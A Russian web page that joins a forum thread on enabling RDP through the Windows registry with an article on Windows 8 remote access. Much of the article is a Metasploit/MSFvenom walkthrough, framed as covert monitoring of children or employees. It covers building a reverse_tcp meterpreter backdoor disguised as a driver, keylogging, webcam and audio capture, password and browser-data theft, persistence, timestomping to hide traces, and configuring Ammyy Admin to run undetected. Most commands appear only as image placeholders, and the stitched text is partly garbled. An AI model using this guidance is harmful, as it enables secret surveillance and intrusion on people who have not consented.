Включение RDP 8/8.1 в Windows 7

Сообщения: 1495
Благодарности: 46

Друзья, подскажите, пожалуйста, можно ли удаленно активировать RDP?

А именно интересует это:

Каким образом установить опцию "Разрешить подключение от компьютеров с любой версией удаленного рабочего стола (опаснее)"?

Дело в том, что установки FdenyTSConnections = 0 (из раздела HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server) недостаточно.

Сообщения: 25157
Благодарности: 3792

Конфигурация компьютера
Процессор: Core™2 Quad Q8300 @ 2.50GHz
Материнская плата: MSI G41M-P33 Combo
Память: PQI DDR2 (PC2-6400) 2×2048
HDD: SSD OCZ-AGILITY3 — 120GB
Видеокарта: Gigabyte GeForce GTX660 2048Mb
ОС: Windows 10 Pro x64 (11082)

Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Сообщения: 1495
Благодарности: 46

из раздела HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services »

Сообщения: 232
Благодарности: 12

Сообщения: 1495
Благодарности: 46

Каким образом установить опцию "Разрешить подключение от компьютеров с любой версией удаленного рабочего стола (опаснее)"? »

Сообщения: 4677
Благодарности: 1090

Конфигурация компьютера
Процессор: Core™i5 (3427M)
Память: 8Gb DDR3
Видеокарта: Intel HD Graphics
Ноутбук/нетбук: Dell Latitude 6430u
ОС: Windows 7 Enterprise

——-
в личке я не консультирую и не отвечаю на профессиональные вопросы. для этого есть форум.

Сообщения: 5401
Благодарности: 1882

Конфигурация компьютера
ОС: OpenSUSE Tumbleweed en-us, Windows 10 Pro x64 en-us

The_Immortal,
Если флажок Разрешать подключения от компьютеров с любой версией удаленного рабочего стола (опаснее) не установлен и недоступен для выбора, значит параметр групповой политики Требовать проверку подлинности на уровне сети для удаленных подключений был включен и применен к серверу Узел сеансов удаленных рабочих столов.

——-
Кто реку перешел, тому росы бояться ни к чему

Сообщения: 1495
Благодарности: 46

Если флажок Разрешать подключения от компьютеров с любой версией удаленного рабочего стола (опаснее) не установлен и недоступен для выбора »

Он доступен для выбора.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
“SecurityLayer”=0 »

Сделал, но опция не поменялась => коннект не происходит.

UPD: в общем, сравнил снапшоты реестров до включения этой опции и после. Результаты во вложении.

Помимо переключения fDenyTSConnections, у параметра HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch\Epoch происходит смещение значения на 4 байта, а также настраивается файрвол.

Таким образом, правильный ответ был дан здесь (только лучше использовать более актуальный netsh advfirewall) + вот это:

FdenyTSConnections = 0 (из раздела HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server) »

Последний раз редактировалось The_Immortal, 23-05-2015 в 23:53 .

Сообщения: 36
Благодарности: 2

Помимо переключения fDenyTSConnections, у параметра HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch\Epoch происходит смещение значения на 4 байта, а также настраивается файрвол. »

Неверная информация. Сейчас сам занимался этим вопросом.
За переключение режимов отвечает параметр UserAuthentication

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"UserAuthentication"=dword:00000001
По умолчанию.

Предоставление доступа

Очень важно, чтобы у пользователя был установлен пароль. Без него зайти в систему с использованием RDP будет невозможно — это программное ограничение. Поэтому всем учетным записям ставим пароли.

У пользователей с правами администратора права на использование удаленного стола есть по умолчанию. Чтобы обычная учетная запись могла использоваться для удаленного входа в систему, добавьте ее в группу Пользователи удаленного рабочего стола. Для этого открываем консоль управления компьютером (команда compmgmt.msc) — переходим по разделам Служебные программыЛокальные пользователи и группыГруппы и кликаем дважды по Пользователи удаленного рабочего стола:

Добавление пользователя в группу для подключения к удаленному рабочему столу

В открывшемся окне добавляем необходимых пользователей.

Для проверки правильности настроек, используйте программу Подключение к удаленному рабочему столу (находится в меню Пуск или вызывается командой mstsc) на любом другом компьютере в сети.

Подключение к удаленному рабочему столу Windows 8

Случается, что важные файлы, которые находятся на домашнем ПК, нужны в самых непредвиденных обстоятельствах – в командировке, на учебе и т.п. Если знакомые или родственники не смогут разобраться в специфике приложений или c поиском нужных объектов, то удаленное управление легко решит эту проблему. Благодаря сторонним программам или встроенным сервисам оболочки Windows 8 правильная их настройка обеспечит стабильный доступ к данным и возможность управления ими на расстоянии.

p, blockquote 1,0,0,0,0 —>

Что такое удаленный доступ к компьютеру Windows 8

Поддержка Удаленного рабочего стола предусмотрена только в редакции Enterprise и Professional оболочки Windows 8. Чтобы подключиться к другой машине, необходимо соблюдать совпадение операционных систем, поскольку для Linux или серверной Windows сделать это невозможно.

p, blockquote 2,0,0,0,0 —>

Операция подключения осуществляется за счет RDP протокола и подразумевает подключение машины к локальной или глобальной сети. Изначально подобные технологии встраивались исключительно в серверные версии оболочек. Однако многочисленные просьбы пользователей и мастеров, обслуживающих компьютеры, сподвигли разработчиков Microsoft на внедрение опции в систему Windows XP. Для восьмой версии данная система получила дополнительные коррекции и усовершенствования.

p, blockquote 3,0,0,0,0 —>

ВАЖНО: По умолчанию RDP-протокол после установки оболочки заблокирован. Это сделано в целях безопасности пользователей и их данных.

Для работы протокола удаленного доступа должно выполняться условие активной работы системы, т.е. отсутствие перехода ее в спящий режим. Учетная запись Windows 8 обязательно в целях безопасности должна быть запароленной.

p, blockquote 5,0,0,0,0 —>

Подключение к удаленному рабочему столу Windows 8 средствами оболочки

Начало настройки удаленного доступа производится с входа в «Свойства системы». Необходимо выполнить следующие шаги:

  1. Подключить и настроить конфигурацию удаленного рабочего стола можно через вызов «Свойств», что находится в контекстном меню значка «Мой компьютер».
  2. Здесь нужно перейти на ссылку «Настроить удаленное управление».Настройка удаленного доступа
  3. Зайти в открывшемся диалоговом окне на вкладку «Удаленный доступ».
  4. Триггерный переключатель нужно установить на «Разрешить…» и отметить флажком «Разрешить подключения только…», также устанавливаем галочку на соответствующей опции в блоке «Удаленный помощник».Разрешить удаленный доступ
  5. Чтобы в реестр данные изменения внеслись, нужно нажать кнопку «Применить», а окно закрывается нажатием на «Да».
  6. Для изменения названия группы нужно зайти в «Свойства» оболочки и там нажать «Изменить параметры».Изменить название Рабочей группы
  7. В диалоговом окне «Свойства системы» на вкладке «Имя ПК» выбрать «Изменить…», чтобы задать иное название Рабочей группы.Свойства системы
  8. В нижней форме с областью для внесения текста нужно прописать новое название и сохранить операцию. Чтобы изменения вступили в силу нужно перезапустить оболочку.
  9. Для организации связи требуется запуск службы для подключения к ПК. Для этого запускается приложение «Выполнить» с помощью комбинации «горячих клавиш» «Win» + «R» и в нем вводится команда «mstsc». Для подтверждения действий нажимается на клавиатуре «Enter».Вводится команда mstsc
  10. Посредством Командной строки необходимо вписатьIP-адрес машины, к которой будет осуществляться доступ по удаленной связи. Это можно выполнить также посредством свойства подключения или плагина браузера. В строке ввода в командном интерпретаторе вводится «ipconfig /all».Ввод команды ipconfig _ all
  11. Спустя несколько минут должно выполниться подключение.Подключение к удаленному Рабочему столу
  12. Если осуществляется подключение правильно, то появляется диалоговое окно, в котором необходимо выбрать нужную учетную запись и ввести известный обеим сторонам коннекта пароль. Для обзора Рабочего стола удаленной машины нужно подтвердить действия нажатием на «ОК».
  13. В результате успешной проверки пароля должно появиться окно с данными о проверке сертификата. Нужно нажать «Да».
  14. Рабочий стол удаленной машины появится спустя несколько секунд.

ВАЖНО: За безопасность ПК волноваться необходимости нет, поскольку RDP-протокол передается только зашифрованным, а передача данных доступна для машин с одной рабочей группы.

Как подключиться к удаленному рабочему столу Windows 8 с помощью сторонних ресурсов

Несмотря на простоту настройки удаленного управления ПК в самой оболочке многим пользователям отсутствие возможности коннекта к машинам другой рабочей группы является серьезным препятствием. Для решения проблемы используются сторонние приложения, например, Team Viewer. Главное достоинство утилиты – это свободное распространение и простота в эксплуатации. Для использования данного ПО нужно:

Team Viewer

  1. Запустить приложение, чтобы подключиться посредством RDP-протокола.
  2. В открывшемся окне перейти на вкладку «Удаленное управление».
  3. Необходимо одновременно запустить утилиту и на машине, к которой требуется подключение.
  4. Если данная вкладка открывается по умолчанию на обоих ПК, то в соответствующих полях следует ввести IDкомпьютера-партнера.
  5. Переключатель нужно переместить из «Передача файлов» на опцию «Удаленное подключение» и для закрепления действия нажать «Подключиться к…».
  6. Чтобы отобразился Рабочий стол удаленной системы нужно ввести заданные одинаковые для обеих машин пароли, соответствующие имена учетных записей. Нажать на «Вход в систему».
  7. При успешном коннекте доступ будет полностью открыт для действий с удаленного ПК.

Как включить удаленный доступ к компьютеру Windows 8 посредством инструмента Metasploit

Чаще всего к ПК удаленный доступ настраивается при обоюдном согласии владельцев обеих машин или устройств одного пользователя. Однако есть много других ситуаций, где требуется незаметное наблюдение за действиями пользователя. Это и контроль занятий на ПК детей, наблюдение за сотрудниками в рабочий период и т.п. Такой подход предохранит от небезопасных действий или потери полезного времени на игры или безделье. Для организации подобного мероприятия в среде Windows 8 есть инструмент Metasploit, который позволяет не только получить доступ к отображению рабочего стола, но и совершать много действий удаленно: захват с вебки видео- или аудио-сигнала, создание снимков в реальном времени веб-камерой, управление файлами и т.п.

p, blockquote 9,0,0,0,0 —>

Для воздействия на удаленный компьютер используется понятие «полезной нагрузки», которая заключается в выполнении определенного действия частью программы или кода. Чаще всего это вредоносные приложения, но любое вторжение таким образом на чужой ПК подразумевает вражеские намерения. Чтобы проникнуть на другую машину нужно пользоваться генератором такой нагрузки (MSFvenom в инструменте Metasploit) или писать код самостоятельно. Во втором варианте большая вероятность пропуска нежданного гостя антивирусной системой.

p, blockquote 10,0,0,0,0 —>

Существует понятие трояна и бэкдора. Здесь первое приложение объединяет группу ПО, которые несут полезную нагрузку и при этом воспринимаются системой как легитимная программа. Под бэкдором принято понимать технологию или выполняемый файл, который дает к информационному ресурсу несанкционированный доступ. Для организации удаленного доступа определение, к какой категории относится приложение, большой разницы не имеет, поскольку генерирование «– x» ключа приложением MSFvenom позволит создать программы с бэкдором.

p, blockquote 11,0,0,0,0 —>

Инструкция использования генератора MSFvenom:

  1. Рассмотреть использование, введением в Командной строке:Команда
  2. Отображение опций в следующем виде:Команды
  3. Для создания полезной нагрузки используется флаг –f и –p:Команды

Здесь нужно знать значение обозначений:

p, blockquote 12,0,0,0,0 —>

-o /tmp/my_payload.exe – сохрание в указанном файле сгенерированного кода;

p, blockquote 13,0,0,0,0 —>

-f exe – указывается как исполняемое приложение формат;

p, blockquote 14,0,0,0,0 —>

lport=4444 – код порта для обратного коннекта;

p, blockquote 15,0,0,0,0 —>

lhost=IP_подключающегося — адрес инициатора удаленного доступа;

p, blockquote 16,0,0,0,0 —>

-p windows/meterpreter/reverse_tcp – тип выбранной полезной нагрузки.

p, blockquote 17,0,0,0,0 —>

4. Указание флага -p для создания полезной нагрузки обязательно, только после него можно указать конкретно вид приложения и характер его действий. Для отображения имеющихся в системе Metasploit поддерживаемых нагрузок вводится команда:

p, blockquote 18,0,0,0,0 —>

Команда

p, blockquote 19,0,0,0,0 —>

Результат выполнения выводит следующий список.

p, blockquote 20,0,0,0,0 —>

Список

p, blockquote 21,0,0,0,0 —>

ПРИМЕЧАНИЕ: На сегодня в списке нагрузок инструмента Metasploit содержится от 538 позиций, созданных для различных платформ. Вид перечня содержит столбец с названием полезной нагрузки и краткую характеристику ее.

Одним из способов удаленного управления является работа утилиты через внедрение dll с динамической выгрузкой и загрузкой плагинов и скриптов. Чаще всего для такой цели применяется meterpreter. Если для прямого проникновения используется bind, что обозначает прослушивание конкретного порта в поисках подключающегося ПО, то обходить даже файерволы помогает reverse – самостоятельно инициирует коннект к нужному ПК. Использование удаленной технологии VNC подразумевает слово vncinject.

p, blockquote 23,0,0,0,0 —>

В широком смысле разделяется вся полезная нагрузка на две огромные категории:

  • требующая, после активации на удаленной машине, дополнительных действий;
  • не нуждающаяся в поддержке, действует после доставки на ПК.

Многие полезные нагрузки обладают определенными опциями, которые можно узнать с помощью флага —list-options. Для вывода информации об определенной нагрузке следует указывать флаг –p, например:

p, blockquote 25,0,0,0,0 —>

Команды

p, blockquote 26,0,0,0,0 —>

Список команд

p, blockquote 27,0,0,0,0 —>

Команды

p, blockquote 28,0,0,0,0 —>

Выведется на экран следующее:

p, blockquote 29,0,0,0,0 —>

Команды

p, blockquote 30,0,0,0,0 —>

В столбце Required указывается обязательность выполнения опции, что для некоторых имеет значение по умолчанию. При условии отсутствия данного параметра, он указывается в процессе непосредственной генерации.

p, blockquote 31,0,0,0,0 —>

p, blockquote 32,0,0,0,0 —>

Команды

p, blockquote 33,0,0,0,0 —>

Не обязательно указывать значение 4444 для опции lport поскольку применяться будет параметр по умолчанию, а установка для lhost=IP_подключающегося указывается как LHOST.

p, blockquote 34,0,0,0,0 —>

Обязательный флаг кроме –p еще и –f, который для полезной нагрузки устанавливает ее формат. Для вывода перечня поддерживаемых параметров необходимо задать команду:

p, blockquote 35,0,0,0,0 —>

Команда

p, blockquote 36,0,0,0,0 —>

В результате на экране появится следующий список:

p, blockquote 37,0,0,0,0 —>

Команды

p, blockquote 38,0,0,0,0 —>

Среди наиболее популярных видов полезной нагрузки:

p, blockquote 39,0,0,0,0 —>

Команда

p, blockquote 40,0,0,0,0 —>

Команда для получения своего адреса IP:

p, blockquote 41,0,0,0,0 —>

Команда

p, blockquote 42,0,0,0,0 —>

Для отображения внешнего IP:

p, blockquote 43,0,0,0,0 —>

Команда

p, blockquote 44,0,0,0,0 —>

Например, в локальной сети с IP 192.168.0.196 команда:

p, blockquote 45,0,0,0,0 —>

Команда

p, blockquote 46,0,1,0,0 —>

Вызовет следующие действия:

p, blockquote 47,0,0,0,0 —>

Подключение к удаленному рабочему столу Windows 8

p, blockquote 48,0,0,0,0 —>

Это создаст приложение backdoor.exe.

p, blockquote 49,0,0,0,0 —>

Для комбинации нескольких полезных нагрузок используется флаг -c, что требует включения win32 файла с шеллкодом с указанием на такой:

p, blockquote 50,0,0,0,0 —>

Команда

p, blockquote 51,0,0,0,0 —>

Здесь указывается как включенный в полезную нагрузку файл mes1.

p, blockquote 52,0,0,0,0 —>

Команда

p, blockquote 53,0,0,0,0 —>

Прописывание -c mes2 позволяет внести в ранее сгенерированный бинарный компонент файла mes2:

p, blockquote 54,0,0,0,0 —>

p, blockquote 55,0,0,0,0 —>

В результате данных действий создается файл с расширением *.exe, который называется driver_dlya_tvoego_computera и в результате выполнения откроет пару окон с последующей попыткой подключения к удаленной машине.

p, blockquote 56,0,0,0,0 —>

С помощью опции -x указывается существующий шаблон файла, что снижает подозрение за счет замены существующего в оболочке файла или выполнения полезных функций. Благодаря опции –k с одновременным использованием с предыдущей сохраняет в поведении шаблона привычное для системы выполнение функций, запускающая полезную нагрузку в виде отдельного потока:

p, blockquote 57,0,0,0,0 —>

p, blockquote 58,0,0,0,0 —>

Инструкция по работе в Metasploit с бэкдорами:

1. На ПК, который подключается к другому пользователю нужно запустить генератор:

p, blockquote 59,0,0,0,0 —>

Команда

p, blockquote 60,0,0,0,0 —>

2. Прописать далее:

p, blockquote 61,0,0,0,0 —>

Команды

p, blockquote 62,0,0,0,0 —>

3. При выборе отличной от meterpreter/reverse_tcp полезной нагрузки необходимо проследить, чтобы была внесена своя строка в предыдущей команде. Для настройки порта локального ПК и IP прописывается:

p, blockquote 63,0,0,0,0 —>

Команды

p, blockquote 64,0,0,0,0 —>

4. Здесь указывается свой адрес IP вместо имеющегося локального 192.168.0.196. Настройка порта не требуется, если он не менялся. Не обязательно прописывать значение этого параметра, так как установка 4444 выполняется по умолчанию. Модуль запускается после выполнения всех вышеперечисленных настроек:

p, blockquote 65,0,0,0,0 —>

Команда

p, blockquote 66,0,0,0,0 —>

Модуль

p, blockquote 67,0,0,0,0 —>

5. На ПК, к которому осуществляется подключение, необходимо запустить компонент с полезной нагрузкой, что откроет сессию meterpreter в результате подключения бэкдора:

p, blockquote 68,0,0,0,0 —>

Бэкдор

p, blockquote 69,0,0,0,0 —>

Работа в Meterpreter: основные понятия

В интерпретаторе содержится множество команд, которые заучивать необходимости нет, поскольку с помощью команды «help» или «?» вызывается справка с основной информацией. Более полные данные по конкретной опции получить можно при введении в строке перед названием опции флага –h. Например, следующий параметр отобразит характеристики модуля, управляющего веб-камерой:

p, blockquote 70,0,0,0,0 —>

Команда

p, blockquote 71,0,0,0,0 —>

Вид выполнения операции

p, blockquote 72,0,0,0,0 —>

Перечень основных команд:

p, blockquote 73,0,0,0,0 —>

Список команд

p, blockquote 74,0,0,0,0 —>

Благодаря ключевым операциям процесс может автоматизироваться посредством выполнения из файла команд. Доступна запись в канал, последующее применение информации, а также фоновое выполнение многих других задач. Особое место занимают функции run и info, которые запускают выбранный модуль и показывают о нем информацию соответственно. Существует несколько команд, которые носят такое же название и используются для аналогичных целей в ОС Linux:

p, blockquote 75,0,0,0,0 —>

Команды

p, blockquote 76,0,0,0,0 —>

Для выгрузки приложения *.exe с названием driver_dlya_tvoego_computera на удаленную машину потребуется записать:

p, blockquote 77,0,0,0,0 —>

Команда

p, blockquote 78,0,0,0,0 —>

Команда

p, blockquote 79,0,0,0,0 —>

Просмотреть перечень имеющихся на удаленном ПК файлов, а также стянуть zip-архив allen можно так:

p, blockquote 80,0,0,0,0 —>

Команда

p, blockquote 81,0,0,0,0 —>

Команда

p, blockquote 82,0,0,0,0 —>

К Сетевым командам относятся следующие:

p, blockquote 83,0,0,0,0 —>

Сетевые команды

p, blockquote 84,0,0,0,0 —>

В числе Системных команд:

p, blockquote 85,0,0,0,0 —>

Системные команды

p, blockquote 86,0,0,0,0 —>

Благодаря именно этим командам производится доступ к удаленной ОС, что обеспечивает введение команд, завершения процессов, выключение машины, перезагрузка системы, выполнение команд оболочки, сбор данных и заметание следов.

p, blockquote 87,0,0,0,0 —>

Операции интерфейса пользователя:

p, blockquote 88,0,0,0,0 —>

Команды

p, blockquote 89,0,0,0,0 —>

С этим набором производится слежка за клавишами юзера, включение и отключения клавиатуры, мыши, создание скриншотов.

p, blockquote 90,0,0,0,0 —>

Чтобы начался захват нажатия клавиш необходимо прописать:

p, blockquote 91,0,0,0,0 —>

Команда

p, blockquote 92,1,0,0,0 —>

Для определения в отдельных приложениях последовательность нажатия клавиш нужно ввести:

p, blockquote 93,0,0,0,0 —>

Команда

p, blockquote 94,0,0,0,0 —>

Список

p, blockquote 95,0,0,0,0 —>

Веб-камерой управлять позволяет следующий набор команд:

p, blockquote 96,0,0,0,0 —>

Команды

p, blockquote 97,0,0,0,0 —>

Для проверки наличия жертв веб-камеры у ПК, необходимо выполнить следующее:

p, blockquote 98,0,0,0,0 —>

Команда

p, blockquote 99,0,0,0,0 —>

Как видно активная камера, с которой удаленно доступно сделать снимок, носит название SC-20FHL11146M. Чтобы запустить захват и сохранение картинки нужно прописать и поменять на нужное имя веб-девайса:

p, blockquote 100,0,0,0,0 —>

Команда

p, blockquote 101,0,0,0,0 —>

Команды

p, blockquote 102,0,0,0,0 —>

Команды, позволяющие снять аудиосигнал удаленно с конкретного ПК:

p, blockquote 103,0,0,0,0 —>

Команды

p, blockquote 104,0,0,0,0 —>

Операции, повышающие привилегии:

p, blockquote 105,0,0,0,0 —>

Команды

p, blockquote 106,0,0,0,0 —>

Список команд, работающих с базами паролей удаленного пользователя:

p, blockquote 107,0,0,0,0 —>

Команда

p, blockquote 108,0,0,0,0 —>

Перечень команд, которые работают с временными файловыми метками Timestomp:

p, blockquote 109,0,0,0,0 —>

Команды

p, blockquote 110,0,0,0,0 —>

Для устранения следов посещения удаленной машины нужно атрибут файла MACE подвергнуть изменению по времени создания, доступа или изменения записи.

p, blockquote 111,0,0,0,0 —>

Организация VNC скрытого доступа к удаленной машине

Чтобы организовать к удаленному ПК скрытый доступ через инструмент VNC нужно выбрать vncinject в качестве полезной нагрузки.

p, blockquote 112,0,0,0,0 —>

1. Примером может быть vncinject/reverse_tcp:

p, blockquote 113,0,0,0,0 —>

Полезная нагрузка

p, blockquote 114,0,0,0,0 —>

2. Если приложение Metasploit не запускалось, его следует открыть:

p, blockquote 115,0,0,0,0 —>

Запуск Metasploit

p, blockquote 116,0,0,0,0 —>

3. В интерпретаторе Metasploit нужно прописать следующее:

p, blockquote 117,0,0,0,0 —>

Команды

p, blockquote 118,0,0,0,0 —>

4. С помощью параметра set rhost устанавливается адрес IP, принадлежащий удаленному хосту.

p, blockquote 119,0,0,0,0 —>

ПРИМЕЧАНИЕ: Здесь используется строка exploit/windows/smb/ms09_050_smb2_negotiate_func_index, что отличает работу данного приложения от Meterpreter.

5. Если эксплойт и соответствующий исполняемый файл запустить, то будет отображаться рабочий стол удаленного ПК зеленого цвета.

p, blockquote 121,0,0,0,0 —>

Читайте также:  Включение Bluetooth на компьютере с Windows 7

С другой стороны аналогичные действия выполняет нагрузка разрядности х64:

p, blockquote 122,0,0,0,0 —>

windows/x64/vncinject/reverse_tcp.

p, blockquote 123,0,0,0,0 —>

ВАЖНО: Для использования данных возможностей просмотрщик VNC должен быть предустановлен на компьютере основного пользователя, который организовывает такой доступ.

Если посещение не является одноразовой акцией, то ест смысл позаботиться о закреплении бэкдора для повторных входов. Ранее это выполнялось скриптом persistence:

p, blockquote 125,0,0,0,0 —>

Скрипт

p, blockquote 126,0,0,0,0 —>

Сейчас Meterpreter с набором этих приложений является устаревшим, что требует использования post/windows/manage/persistence_exe модуля. Он в оболочке Windows устанавливает постоянную EXE полезную нагрузку.

p, blockquote 127,0,0,0,0 —>

В зависимости от привилегии скрипт будет запускаться:

  • SERVICE– требует привилегий для создания службы, запускающей нагрузку;
  • SYSTEM– при наделении файла привилегиями он запустится одновременно с системой;
  • USER– привилегий не требует и запуск нагрузки осуществится при входе в ОС конкретного пользователя.

Модуль обладает следующими опциями:

p, blockquote 129,0,0,0,0 —>

Команды

p, blockquote 130,0,0,0,0 —>

Проиллюстрировать запуск можно следующим образом:

p, blockquote 131,0,0,0,0 —>

Команды

p, blockquote 132,0,0,0,0 —>

Данная запись означает выгрузку файла payload.exe на удаленную машину, переименование его на default.exe с последующим запуском, использующим привилегии системы.

p, blockquote 133,0,0,0,0 —>

p, blockquote 134,0,0,0,0 —>

Команды

p, blockquote 135,0,0,0,0 —>

Выгрузка файла

p, blockquote 136,0,0,0,0 —>

Информация, выводимая модулем, следующая:

p, blockquote 137,0,0,0,0 —>

Команды

p, blockquote 138,0,0,1,0 —>

Путь сохранения файла в системе:

p, blockquote 139,0,0,0,0 —>

Путь в системе к файлу

p, blockquote 140,0,0,0,0 —>

Запись в реестре для автозапуска приложения:

p, blockquote 141,0,0,0,0 —>

Скрытый удаленный доступ

p, blockquote 142,0,0,0,0 —>

Для последующей эксплуатации Metasploit есть следующие модули:

p, blockquote 143,0,0,0,0 —>

Расположение файла в реестре

p, blockquote 144,0,0,0,0 —>

Обеспечивает последующую эксплуатацию:

p, blockquote 145,0,0,0,0 —>

Модуль

p, blockquote 146,0,0,0,0 —>

Извлекает из Google Chrome браузера чувствительную информацию:

p, blockquote 147,0,0,0,0 —>

Модуль Metasploit

p, blockquote 148,0,0,0,0 —>

Извлекает из Total Commander имеющиеся там пароли:

p, blockquote 149,0,0,0,0 —>

Модуль Metasploit

p, blockquote 150,0,0,0,0 —>

Используется для разблокирования экрана оболочки:

p, blockquote 151,0,0,0,0 —>

Модуль Metasploit

На учетные данные ОС осуществляется фишинговая атака:

p, blockquote 152,0,0,0,0 —>

Модуль Metasploit

p, blockquote 153,0,0,0,0 —>

Однако существует множество других модулей:

p, blockquote 154,0,0,0,0 —>

Список

p, blockquote 155,0,0,0,0 —>

Все они могут применяться в период Meterpreter сеанса.

p, blockquote 156,0,0,0,0 —>

ПРИМЕЧАНИЕ: Все изложенные выше инструкции применимы в том случае, если четко известны данные IP-адресов клиента и сервера (подключаемого и подключающегося пользователя), отключение антивирусов и т.п. В других случаях нужно искать методы решения подобных проблем в зависимости от используемого сценария.

Как отключить удаленный доступ к компьютеру Windows 8

Пользоваться запретом на удаленное подключение или закрывать его в системе, где машина обеспечивает работоспособность определенных ресурсов локальной группы не желательно. Это может навредить всей структуре, поэтому нужно учитывать данный момент. Если же препятствий нет, то отключить удаленное управление можно так:

  • установить общий запрет;
  • выключить помощника;
  • отключить системные службы.

Более детально эти шаги представлены ниже.

p, blockquote 159,0,0,0,0 —>

Этап 1. Установка общего запрета

Данное действие подразумевает использование функций, которые встроены в оболочку Windows 8.

p, blockquote 160,0,0,0,0 —>

1. Найти на Рабочем столе «Компьютер» и вызвать на нем контекстное меню, перейти в Свойства системы.

p, blockquote 161,0,0,0,0 —>

Свойства

p, blockquote 162,0,0,0,0 —>

2. В открывшемся окне зайти на вкладку «Настройка удаленного доступа».

p, blockquote 163,0,0,0,0 —>

Настройка

p, blockquote 164,0,0,0,0 —>

3. Это откроет диалоговое окно, где на вкладке «Удаленный доступ» необходимо установить триггер в положение «Не разрешать…». Для подтверждения нажать «Применить».

p, blockquote 165,0,0,0,0 —>

Запрет удаленного подключения

p, blockquote 166,0,0,0,0 —>

Данная операция не позволить выполнять на машине активные действия, но оставит лазейку через Помощника для просмотра событий на ПК.

p, blockquote 167,0,0,0,0 —>

Этап 2. Выключение помощника

Данное приложение предназначено для просмотра действий на другой машине удаленно. Для его отключения нужно:

p, blockquote 168,0,0,0,0 —>

1. В окне «Свойства системы» в блоке Удаленный помощник снять соответствующий флажок с «Разрешить подключения…», а для активации действий нажать «Применить».

p, blockquote 169,0,0,0,0 —>

Снятие флажка

p, blockquote 170,0,0,0,0 —>

Этап 3. Отключить системные службы

Если с помощью отключения помощника и установки запрета на доступ к машине есть возможность себя защитить от потери информации и злоумышленников, то дополнительные мероприятия не помешают. Системные службы позволят защитить от проникновения даже при условии внесенных изначально изменений в настройки доступа. Для работы с службами потребуется:

p, blockquote 171,0,0,0,0 —>

1. Вызвать на значке «Компьютер» контекстное меню и перейти в подпункт «Управление».

p, blockquote 172,0,0,0,0 —>

Опция Управление

p, blockquote 173,0,0,0,0 —>

2. В открывшемся окне нужно перейти на блок «Службы и приложения», где выбрать «Службы», что в правой части окна откроет содержащиеся файлы.

p, blockquote 174,0,0,0,0 —>

Службы

p, blockquote 175,0,0,0,0 —>

3. Первоочередно отключается доступ в «Службах удаленных…», что выполняется через вызов контекстного меню на соответствующем компоненте.

p, blockquote 176,0,0,0,0 —>

Свойства

p, blockquote 177,0,0,0,0 —>

4. Для остановки службы нужно установить режим «Отключена» в строке «Тип запуска». Подтверждение действий выполняется нажатием «Применить».

p, blockquote 178,0,0,0,0 —>

Отключение удаленного запуска

p, blockquote 179,0,0,0,0 —>

5. Помимо данной службы отключить необходимо еще несколько:

  • Удаленного помощника – отключение описывалось выше;
  • Удаленный реестр – для блокирования смены настроек пользователями сети системного реестра;
  • NetBIOS– протокол, с помощью которого в локальной сети обнаруживаются устройства;
  • WS-Management – обеспечивает управление машиной с помощью консольного интерпретатора;
  • Telnet– может называться не так, но обязательно содержать слово «Telnet». Служба обеспечивает аналогичные возможности для удаленного управления как WS-Management.

ВАЖНО: Работа с данными компонентами возможна только на Root-правах, поэтому с пользовательской учетной записи отключить или перенастроить не получится.

Скрытое удаленное управление компьютером Windows 8

Устроить управление машиной без ведома пользователя можно несколькими способами, в том числе сторонними ресурсами, распространяющимися на коммерческой основе. Именно такие продукты обходят антивирусное ПО и фаерволы, не оставляя следов своей деятельности на компьютере.

p, blockquote 182,0,0,0,0 —>

Одно из наиболее популярных приложений для скрытого управления ПК является Ammyy Admin. Оно обладает такими преимуществами:

  1. В рамках домашнего использования не требует оплаты за дистрибутив;
  2. Дополнительной опцией является включение интерактивного чата для прослушивания всего, что происходит с обратной стороны удаленной системы;
  3. Если лимит использования не превышается, то программу обнаружить невозможно;
  4. Если приложение настраивается правильно, то даже опытным компьютерщикам сложно ее обнаружить;
  5. Доступ к машине выполняется через Интернетс любого другого оборудования;
  6. Время подключения не превышает нескольких секунд.

Подключение и настройка параметров Ammyy Admin занимает всего минуту-две.

p, blockquote 184,0,0,0,0 —>

Инструкция по установке и настройке приложения на удаленном клиенте

  1. Скачать приложение с официального ресурса, найти его у себя в «Загрузках» или другой казанной при скачивании папке.Права доступа
  2. Запустить программу, нажать в главном меню окна на «Ammyy», а с появившегося списка выбрать «Настройки».Ammyy Admin
  3. В открывшемся диалоговом окне выбрать вкладку «Клиент», где нажать кнопку «Права доступа».
  4. Это откроет еще одно окно, где нужно нажать «Добавить».Настройки
  5. Далее следует заполнить строку Computer ID, где внести набор символов «ANY» , а также дважды ввести придуманный заранее пароль.Пароль и ID компьютера
  6. Зайти в меню главного окна приложения в пункт «Ammyy», где пункт со стрелочкой «Служба» при наведении откроет еще один список. Здесь следует выбрать «Установить».Установка доступа
  7. Снова зайти в «Ammyy», перейти в «Службы», но на этот раз выбрать «Запустить».Запуск Службы
  8. Программу теперь можно закрыть. После данных настроек с каждой загрузкой оболочки будет скрыто запускаться Ammyy Admin.
  9. Для отключения признаков наличия удаленного управления на машине нужно перейти в главном меню на пункт «Ammyy» и выбрать там «Настройки». Это откроет диалоговое окно, где необходимо все флажки, кроме первого, снять. Для подтверждения действий нажать «ОК».
  10. Данные IDкомпьютера нужно обязательно запомнить или записать, поскольку для подключения данная информация понадобится. Отображается IDв зеленом поле главного окна приложения.Ваш ID

Теперь все настройки завершены. Подключиться с имеющимся ID и паролем доступно с любой точки мира, имея под рукой доступ к интернету и при условии подключения проверяемой машины.

Инструкция по установке и настройке приложения на основном компьютере, с которого выполняется удаленное управление

Подключение в Ammyy Admin

  1. Прежде всего, необходимо скачать дистрибутив приложения или воспользоваться имеющемся на переносном носителе, который использовался для установки на ПК-клиент.
  2. После установки запустить программу Ammyy Admin, в открывшемся главном окне ввести данные клиентского оборудования, а именно IPадрес и IDмашины.
